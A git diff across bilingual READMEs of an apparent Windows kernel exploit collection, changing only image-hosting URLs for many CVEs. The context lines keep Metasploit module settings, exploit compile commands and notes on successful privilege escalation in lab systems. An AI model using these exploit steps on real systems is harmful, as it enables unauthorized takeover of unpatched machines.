diff --git a/CVE-2003-0352/README.md b/CVE-2003-0352/README.md index f531dd4..5100bd9 100644 --- a/CVE-2003-0352/README.md +++ b/CVE-2003-0352/README.md @@ -34,9 +34,9 @@ set RHOST 192.168.1.17 run ``` -![image-20200823200752021](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2003-0352_win2000_x86_msf.png) +![image-20200823200752021](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2003-0352_win2000_x86_msf.png) 查看系统信息 -![CVE-2003-0352_win2000_x86_msf2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2003-0352_win2000_x86_msf2.png) +![CVE-2003-0352_win2000_x86_msf2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2003-0352_win2000_x86_msf2.png) diff --git a/CVE-2003-0352/README_EN.md b/CVE-2003-0352/README_EN.md index c820c8a..cb2a754 100644 --- a/CVE-2003-0352/README_EN.md +++ b/CVE-2003-0352/README_EN.md @@ -34,9 +34,9 @@ set RHOST 192.168.1.17 run ``` -![image-20200823200752021](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2003-0352_win2000_x86_msf.png) +![image-20200823200752021](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2003-0352_win2000_x86_msf.png) View system information -![CVE-2003-0352_win2000_x86_msf2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2003-0352_win2000_x86_msf2.png) +![CVE-2003-0352_win2000_x86_msf2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2003-0352_win2000_x86_msf2.png) diff --git a/CVE-2008-1084/README.md b/CVE-2008-1084/README.md index 18d8ca9..7825cfc 100644 --- a/CVE-2008-1084/README.md +++ b/CVE-2008-1084/README.md @@ -22,7 +22,7 @@ 测试系统Windows Server 2003 SP2 x86 -![27](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-1084_win2003_x86.gif) +![27](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-1084_win2003_x86.gif) #### 分析文章 - https://github.com/lyshark/Windows-exploits/blob/master/Windows%20%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%20ms08025%20%E5%88%86%E6%9E%90.7z 
diff --git a/CVE-2008-1084/README_EN.md b/CVE-2008-1084/README_EN.md index 4116162..515230e 100644 --- a/CVE-2008-1084/README_EN.md +++ b/CVE-2008-1084/README_EN.md @@ -22,7 +22,7 @@ Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, S Test system Windows Server 2003 SP2 x86 -![27](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-1084_win2003_x86.gif) +![27](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-1084_win2003_x86.gif) #### Analyze - https://github.com/lyshark/Windows-exploits/blob/master/Windows%20%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%20ms08025%20%E5%88%86%E6%9E%90.7z diff --git a/CVE-2008-3464/README.md b/CVE-2008-3464/README.md index d24cfe4..2cb5b9c 100644 --- a/CVE-2008-3464/README.md +++ b/CVE-2008-3464/README.md @@ -20,7 +20,7 @@ 只找到可执行exe文件,测试系统Windows Server 2003 SP2 x86 -![26](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-3464_win2003_x86.gif) +![26](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-3464_win2003_x86.gif) #### 分析文章 - https://bbs.pediy.com/thread-74811.htm \ No newline at end of file diff --git a/CVE-2008-3464/README_EN.md b/CVE-2008-3464/README_EN.md index 9b2f3f8..69c8088 100644 --- a/CVE-2008-3464/README_EN.md +++ b/CVE-2008-3464/README_EN.md @@ -21,7 +21,7 @@ afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP Only find Exe files, test systems Windows Server 2003 SP2 x86 -![26](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-3464_win2003_x86.gif) +![26](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-3464_win2003_x86.gif) #### Analyze - https://bbs.pediy.com/thread-74811.htm \ No newline at end of file diff --git a/CVE-2008-4037/README.md b/CVE-2008-4037/README.md index c195d3c..f4cd876 100644 --- a/CVE-2008-4037/README.md +++ b/CVE-2008-4037/README.md 
@@ -27,5 +27,5 @@ set SMBHOST 192.168.1.14 #目标IP run ``` -![image-20200823142846532](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-4037_win2003_x86_msf.png) +![image-20200823142846532](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-4037_win2003_x86_msf.png) diff --git a/CVE-2008-4037/README_EN.md b/CVE-2008-4037/README_EN.md index 7b7109a..9723964 100644 --- a/CVE-2008-4037/README_EN.md +++ b/CVE-2008-4037/README_EN.md @@ -28,5 +28,5 @@ set SMBHOST 192.168.1.14 #目标IP run ``` -![image-20200823142846532](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-4037_win2003_x86_msf.png) +![image-20200823142846532](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-4037_win2003_x86_msf.png) diff --git a/CVE-2008-4250/README.md b/CVE-2008-4250/README.md index 12a183b..ea93dff 100644 --- a/CVE-2008-4250/README.md +++ b/CVE-2008-4250/README.md @@ -29,7 +29,7 @@ set RHOST 192.168.1.14 run ``` -![image-20200823143331505](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-4250_win2003_x86_msf.png) +![image-20200823143331505](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-4250_win2003_x86_msf.png) #### 分析文章 - https://bbs.pediy.com/thread-251219.htm diff --git a/CVE-2008-4250/README_EN.md b/CVE-2008-4250/README_EN.md index 04d0f7e..2c60fee 100644 --- a/CVE-2008-4250/README_EN.md +++ b/CVE-2008-4250/README_EN.md @@ -30,7 +30,7 @@ set RHOST 192.168.1.14 run ``` -![image-20200823143331505](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-4250_win2003_x86_msf.png) +![image-20200823143331505](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-4250_win2003_x86_msf.png) #### Analyze - https://bbs.pediy.com/thread-251219.htm diff --git a/CVE-2009-2532/README.md b/CVE-2009-2532/README.md index 4e0b7e8..c61c263 100644 --- a/CVE-2009-2532/README.md +++ b/CVE-2009-2532/README.md 
@@ -24,7 +24,7 @@ set RHOSTS 192.168.1.13 #目标IP run ``` -![image-20200823134421895](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2009-2532_win2008_x86_msf.png) +![image-20200823134421895](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2009-2532_win2008_x86_msf.png) #### 分析文章 - https://www.giantbranch.cn/2017/08/26/Educatedscholar%E5%88%A9%E7%94%A8%E7%9A%84%E6%BC%8F%E6%B4%9Ems09-050%E5%88%86%E6%9E%90%E5%8F%8A%E5%85%B6%E5%88%A9%E7%94%A8%E7%9A%84shellcode%E5%88%86%E6%9E%90%E5%8F%8A%E4%B8%8Emsf%E5%88%A9%E7%94%A8%E5%AF%B9%E6%AF%94/ diff --git a/CVE-2009-2532/README_EN.md b/CVE-2009-2532/README_EN.md index a469618..e4a3c20 100644 --- a/CVE-2009-2532/README_EN.md +++ b/CVE-2009-2532/README_EN.md @@ -25,7 +25,7 @@ set RHOSTS 192.168.1.13 #目标IP run ``` -![image-20200823134421895](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2009-2532_win2008_x86_msf.png) +![image-20200823134421895](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2009-2532_win2008_x86_msf.png) #### Analyze - https://www.giantbranch.cn/2017/08/26/Educatedscholar%E5%88%A9%E7%94%A8%E7%9A%84%E6%BC%8F%E6%B4%9Ems09-050%E5%88%86%E6%9E%90%E5%8F%8A%E5%85%B6%E5%88%A9%E7%94%A8%E7%9A%84shellcode%E5%88%86%E6%9E%90%E5%8F%8A%E4%B8%8Emsf%E5%88%A9%E7%94%A8%E5%AF%B9%E6%AF%94/ diff --git a/CVE-2010-0233/README.md b/CVE-2010-0233/README.md index 785cb4d..20900e7 100644 --- a/CVE-2010-0233/README.md +++ b/CVE-2010-0233/README.md @@ -26,7 +26,7 @@ 测试系统Windows Server 2003 SP2 x86 -![25](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86.gif) +![25](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86.gif) > msf利用 
@@ -40,8 +40,8 @@ run 可以看到当前权限是最低的 -![image-20200823123824229](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86_msf.png) +![image-20200823123824229](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86_msf.png) 然后执行命令提权 -![image-20200823123945054](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86_msf2.png) \ No newline at end of file +![image-20200823123945054](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86_msf2.png) \ No newline at end of file diff --git a/CVE-2010-0233/README_EN.md b/CVE-2010-0233/README_EN.md index 0af1911..a6602ee 100644 --- a/CVE-2010-0233/README_EN.md +++ b/CVE-2010-0233/README_EN.md @@ -27,7 +27,7 @@ CompilerEnvironment Test system Windows Server 2003 SP2 x86 -![25](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86.gif) +![25](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86.gif) > MSF utilization @@ -41,8 +41,8 @@ run You can see that the current permissions are the lowest. -![image-20200823123824229](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86_msf.png) +![image-20200823123824229](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86_msf.png) Then execute command rights -![image-20200823123945054](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86_msf2.png) \ No newline at end of file +![image-20200823123945054](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86_msf2.png) \ No newline at end of file diff --git a/CVE-2010-1897/README.md b/CVE-2010-1897/README.md index c6ef3df..c143060 100644 --- a/CVE-2010-1897/README.md +++ b/CVE-2010-1897/README.md 
@@ -22,5 +22,5 @@ win32k.sys中的Windows内核模式驱动程序无法正确验证伪句柄值 测试系统Windows Server 2003 SP2 x86 -![24](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-1897_win2003_x86.gif) +![24](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-1897_win2003_x86.gif) diff --git a/CVE-2010-1897/README_EN.md b/CVE-2010-1897/README_EN.md index 9ec9373..ca1deaf 100644 --- a/CVE-2010-1897/README_EN.md +++ b/CVE-2010-1897/README_EN.md @@ -23,5 +23,5 @@ The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP Test system Windows Server 2003 SP2 x86 -![24](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-1897_win2003_x86.gif) +![24](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-1897_win2003_x86.gif) diff --git a/CVE-2010-3338/README.md b/CVE-2010-3338/README.md index 19decbf..2c32f35 100644 --- a/CVE-2010-3338/README.md +++ b/CVE-2010-3338/README.md @@ -25,9 +25,9 @@ set SESSION 2 run ``` -![image-20200822234422637](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-3338_win2008_x86_msf.png) +![image-20200822234422637](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-3338_win2008_x86_msf.png) 然后就能提权成功了 -![image-20200822234608009](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-3338_win2008_x86_msf2.png) +![image-20200822234608009](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-3338_win2008_x86_msf2.png) diff --git a/CVE-2010-3338/README_EN.md b/CVE-2010-3338/README_EN.md index e12fdc7..1e36ba8 100644 --- a/CVE-2010-3338/README_EN.md +++ b/CVE-2010-3338/README_EN.md 
@@ -25,9 +25,9 @@ set SESSION 2 run ``` -![image-20200822234422637](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-3338_win2008_x86_msf.png) +![image-20200822234422637](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-3338_win2008_x86_msf.png) Then it will be successful. -![image-20200822234608009](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-3338_win2008_x86_msf2.png) +![image-20200822234608009](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-3338_win2008_x86_msf2.png) diff --git a/CVE-2011-1249/README.md b/CVE-2011-1249/README.md index 5c64ac6..100782a 100644 --- a/CVE-2011-1249/README.md +++ b/CVE-2011-1249/README.md @@ -29,7 +29,7 @@ i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32 测试系统Windows Server 2003 SP2 x86和Windows 7 SP1 x86都成功 -![23](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1249_win2003_x86.gif) +![23](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1249_win2003_x86.gif) #### 分析文章 - https://github.com/Madusanka99/OHTS/blob/master/IT16075504%20-OHTS%20Report.pdf \ No newline at end of file diff --git a/CVE-2011-1249/README_EN.md b/CVE-2011-1249/README_EN.md index f313bb3..2fef2bf 100644 --- a/CVE-2011-1249/README_EN.md +++ b/CVE-2011-1249/README_EN.md @@ -29,7 +29,7 @@ i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32 Test system Windows Server 2003 SP2 x86 and Windows 7 SP1 x86 Can use -![23](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1249_win2003_x86.gif) +![23](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1249_win2003_x86.gif) #### Analyze - https://github.com/Madusanka99/OHTS/blob/master/IT16075504%20-OHTS%20Report.pdf \ No newline at end of file diff --git a/CVE-2011-1974/README.md b/CVE-2011-1974/README.md index 8f1f370..16ef3d7 100644 --- a/CVE-2011-1974/README.md +++ b/CVE-2011-1974/README.md 
@@ -22,9 +22,9 @@ i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32 测试系统Windows Server 2003 SP2 x86,首先需要用管理员修改注册表和开启服务 -![image-20200822202222486](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1974_win2003_x86.png) +![image-20200822202222486](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1974_win2003_x86.png) 接着切回普通用户 -![22](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1974_win2003_x86.gif) +![22](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1974_win2003_x86.gif) diff --git a/CVE-2011-1974/README_EN.md b/CVE-2011-1974/README_EN.md index 2ff7066..4a45062 100644 --- a/CVE-2011-1974/README_EN.md +++ b/CVE-2011-1974/README_EN.md @@ -23,9 +23,9 @@ i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32 Test system Windows Server 2003 SP2 x86,First, you need to modify the registry and open service with an administrator. -![image-20200822202222486](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1974_win2003_x86.png) +![image-20200822202222486](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1974_win2003_x86.png) Then cut back to ordinary users -![22](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1974_win2003_x86.gif) +![22](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1974_win2003_x86.gif) diff --git a/CVE-2011-2005/README.md b/CVE-2011-2005/README.md index 31f9d40..8a5c472 100644 --- a/CVE-2011-2005/README.md +++ b/CVE-2011-2005/README.md @@ -16,7 +16,7 @@ 测试系统Windows Server 2003 SP2 x86 -![21](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-2005_win2003_x86.gif) +![21](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-2005_win2003_x86.gif) msf利用直接使用这个即可 diff --git a/CVE-2011-2005/README_EN.md b/CVE-2011-2005/README_EN.md index fc25d9f..11dc997 100644 --- a/CVE-2011-2005/README_EN.md +++ b/CVE-2011-2005/README_EN.md 
@@ -16,7 +16,7 @@ afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Test system Windows Server 2003 SP2 x86 -![21](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-2005_win2003_x86.gif) +![21](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-2005_win2003_x86.gif) MSF uses it directly to use this diff --git a/CVE-2012-0217/README.md b/CVE-2012-0217/README.md index 5a9fff8..0c0385c 100644 --- a/CVE-2012-0217/README.md +++ b/CVE-2012-0217/README.md @@ -23,5 +23,5 @@ 测试系统Windows Server 2008 R2 SP1 x64 -![20](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2012-0217_win2008_x64.gif) +![20](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2012-0217_win2008_x64.gif) diff --git a/CVE-2012-0217/README_EN.md b/CVE-2012-0217/README_EN.md index 344a2ef..25df314 100644 --- a/CVE-2012-0217/README_EN.md +++ b/CVE-2012-0217/README_EN.md @@ -24,5 +24,5 @@ CompilerEnvironment Test system Windows Server 2008 R2 SP1 x64 -![20](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2012-0217_win2008_x64.gif) +![20](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2012-0217_win2008_x64.gif) diff --git a/CVE-2013-1332/README.md b/CVE-2013-1332/README.md index df27681..a086c12 100644 --- a/CVE-2013-1332/README.md +++ b/CVE-2013-1332/README.md @@ -27,7 +27,7 @@ 测试系统Windows Server 2003 SP2 x86 -![19](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1332_win2003_x86.gif) +![19](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1332_win2003_x86.gif) #### 分析文章 - https://www.anquanke.com/vul/id/1045064 diff --git a/CVE-2013-1332/README_EN.md b/CVE-2013-1332/README_EN.md index 9243e1d..6934336 100644 --- a/CVE-2013-1332/README_EN.md +++ b/CVE-2013-1332/README_EN.md 
@@ -27,7 +27,7 @@ CompilerEnvironment Test system Windows Server 2003 SP2 x86 -![19](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1332_win2003_x86.gif) +![19](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1332_win2003_x86.gif) #### Analyze - https://www.anquanke.com/vul/id/1045064 diff --git a/CVE-2013-1345/README.md b/CVE-2013-1345/README.md index df5b4c7..7970ba9 100644 --- a/CVE-2013-1345/README.md +++ b/CVE-2013-1345/README.md @@ -31,15 +31,15 @@ set SESSION 2 #你上线机器的session run ``` -![image-20200822151416515](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win7_x86.png) +![image-20200822151416515](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win7_x86.png) Windows Sever 2003 SP2 x86 和Windows Sever 2003 R2 SP2 x86都测试成功,但是利用文件没有源码只有exe可执行文件 Windows Sever 2003 SP2 x86 动图如下 -![17](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win2003_x86.gif) +![17](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win2003_x86.gif) Windows Sever 2003 R2 SP2 x86 动图如下 -![18](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win2003_x86_2.gif) +![18](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win2003_x86_2.gif) diff --git a/CVE-2013-1345/README_EN.md b/CVE-2013-1345/README_EN.md index 7c4b233..5545c4c 100644 --- a/CVE-2013-1345/README_EN.md +++ b/CVE-2013-1345/README_EN.md 
@@ -31,15 +31,15 @@ set SESSION 2 #你上线机器的session run ``` -![image-20200822151416515](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win7_x86.png) +![image-20200822151416515](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win7_x86.png) Windows Server 2003 SP2 X86 and Windows Server 2003 R2 SP2 X86 are successful, but the file does not have the source code only exe executable Windows Sever 2003 SP2 x86 GIF -![17](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win2003_x86.gif) +![17](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win2003_x86.gif) Windows Sever 2003 R2 SP2 x86 GIF -![18](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win2003_x86_2.gif) +![18](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win2003_x86_2.gif) diff --git a/CVE-2014-1767/README.md b/CVE-2014-1767/README.md index 5572b14..1c7a46c 100644 --- a/CVE-2014-1767/README.md +++ b/CVE-2014-1767/README.md @@ -27,13 +27,13 @@ 测试系统Windows 7 SP1 x86 ,测试exe文件和py脚本都可以正常利用 -![16](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-1767_win7_x86.gif) +![16](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-1767_win7_x86.gif) > x64利用 测试系统Windows 7 SP1 x64 测试利用py脚本,exe文件有机率蓝屏 -![17](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-1767_win7_x64.gif) +![17](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-1767_win7_x64.gif) #### 分析文章 - https://xz.aliyun.com/t/6770 diff --git a/CVE-2014-1767/README_EN.md b/CVE-2014-1767/README_EN.md index 7a93a9f..ad43ea5 100644 --- a/CVE-2014-1767/README_EN.md +++ b/CVE-2014-1767/README_EN.md 
@@ -28,13 +28,13 @@ With the script is Python, there is also a compiled EXE version Test system Windows 7 SP1 x86 ,Test EXE files and py scripts can be used normally -![16](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-1767_win7_x86.gif) +![16](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-1767_win7_x86.gif) > x64 utilization Test system Windows 7 SP1 x64 Use the PY script, EXE file organically blue screen -![17](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-1767_win7_x64.gif) +![17](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-1767_win7_x64.gif) #### Analyze - https://xz.aliyun.com/t/6770 diff --git a/CVE-2014-4076/README.md b/CVE-2014-4076/README.md index 67ccf02..aa24b8e 100644 --- a/CVE-2014-4076/README.md +++ b/CVE-2014-4076/README.md @@ -20,7 +20,7 @@ i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe 测试机器Windows Server 2003 SP2 x86 -![16](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4076_win2003_x86.gif) +![16](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4076_win2003_x86.gif) #### 分析文章 diff --git a/CVE-2014-4076/README_EN.md b/CVE-2014-4076/README_EN.md index 8323587..a3d1b5a 100644 --- a/CVE-2014-4076/README_EN.md +++ b/CVE-2014-4076/README_EN.md @@ -21,7 +21,7 @@ i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe Test Machine Windows Server 2003 SP2 x86 -![16](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4076_win2003_x86.gif) +![16](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4076_win2003_x86.gif) #### Analyze diff --git a/CVE-2014-4113/README.md b/CVE-2014-4113/README.md index e4e5d05..08d52ee 100644 --- a/CVE-2014-4113/README.md +++ b/CVE-2014-4113/README.md 
@@ -32,13 +32,13 @@ 测试系统Windows 7 SP1 x86 -![14](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4113_win7_x86.gif) +![14](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4113_win7_x86.gif) > x64利用 测试系统Windows 7 SP1 x64 -![15](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4113_win7_x64.gif) +![15](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4113_win7_x64.gif) #### 分析文章 - https://xz.aliyun.com/t/4456 diff --git a/CVE-2014-4113/README_EN.md b/CVE-2014-4113/README_EN.md index 0b0bb83..eceba22 100644 --- a/CVE-2014-4113/README_EN.md +++ b/CVE-2014-4113/README_EN.md @@ -33,13 +33,13 @@ CompilerEnvironment Test system Windows 7 SP1 x86 -![14](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4113_win7_x86.gif) +![14](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4113_win7_x86.gif) > x64 utilization Test system Windows 7 SP1 x64 -![15](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4113_win7_x64.gif) +![15](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4113_win7_x64.gif) #### Analyze - https://xz.aliyun.com/t/4456 diff --git a/CVE-2015-0003/README.md b/CVE-2015-0003/README.md index 4542c62..663b957 100644 --- a/CVE-2015-0003/README.md +++ b/CVE-2015-0003/README.md @@ -30,7 +30,7 @@ 利用Windows 7 SP1 x86作为演示 -![10](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0003_win7_x86.gif) +![10](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0003_win7_x86.gif) > x64利用 @@ -40,7 +40,7 @@ 利用Windows Server 2008 R2 SP1 x64进行测试 -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0003_win2008_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0003_win2008_x64.gif) #### 分析文章 - https://www.shuzhiduo.com/A/Vx5M1WrL5N/ diff --git a/CVE-2015-0003/README_EN.md b/CVE-2015-0003/README_EN.md index 615c8ff..ab4d003 100644 --- a/CVE-2015-0003/README_EN.md 
+++ b/CVE-2015-0003/README_EN.md @@ -30,7 +30,7 @@ CompilerEnvironment Use Windows 7 SP1 X86 as a demonstration -![10](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0003_win7_x86.gif) +![10](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0003_win7_x86.gif) > X64 utilization @@ -40,7 +40,7 @@ CompilerEnvironment Testing with Windows Server 2008 R2 SP1 X64 -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0003_win2008_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0003_win2008_x64.gif) #### Analyze - https://www.shuzhiduo.com/A/Vx5M1WrL5N/ diff --git a/CVE-2015-0057/README.md b/CVE-2015-0057/README.md index c1f2f54..e7cf172 100644 --- a/CVE-2015-0057/README.md +++ b/CVE-2015-0057/README.md @@ -31,7 +31,7 @@ 对Windows 7 SP1 x86进行测试 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0057_win7_sp1_x86.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0057_win7_sp1_x86.gif) #### 分析文章 - https://xz.aliyun.com/t/4549 diff --git a/CVE-2015-0057/README_EN.md b/CVE-2015-0057/README_EN.md index be558b3..52bf069 100644 --- a/CVE-2015-0057/README_EN.md +++ b/CVE-2015-0057/README_EN.md @@ -32,7 +32,7 @@ The test uses the compiled EXP `CVE-2015-0057_x86` and `CVE-2015-0057_x64` found Test Windows 7 SP1 X86 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0057_win7_sp1_x86.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0057_win7_sp1_x86.gif) #### Analyze - https://xz.aliyun.com/t/4549 diff --git a/CVE-2015-1701/README.md b/CVE-2015-1701/README.md index 86ab246..77a76f2 100644 --- a/CVE-2015-1701/README.md +++ b/CVE-2015-1701/README.md 
@@ -24,10 +24,10 @@ 测试机器 Windows 7 SP1 x86 -![12](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-1701_win7_x86.gif) +![12](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-1701_win7_x86.gif) > x64利用 测试使用Windows Server 2008 R2 SP1 x64 -![13](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-1701_win2008_x64.gif) \ No newline at end of file +![13](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-1701_win2008_x64.gif) \ No newline at end of file diff --git a/CVE-2015-1701/README_EN.md b/CVE-2015-1701/README_EN.md index daa6ff6..e89d4a8 100644 --- a/CVE-2015-1701/README_EN.md +++ b/CVE-2015-1701/README_EN.md @@ -24,10 +24,10 @@ CompilerEnvironment Test Machine Windows 7 SP1 x86 -![12](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-1701_win7_x86.gif) 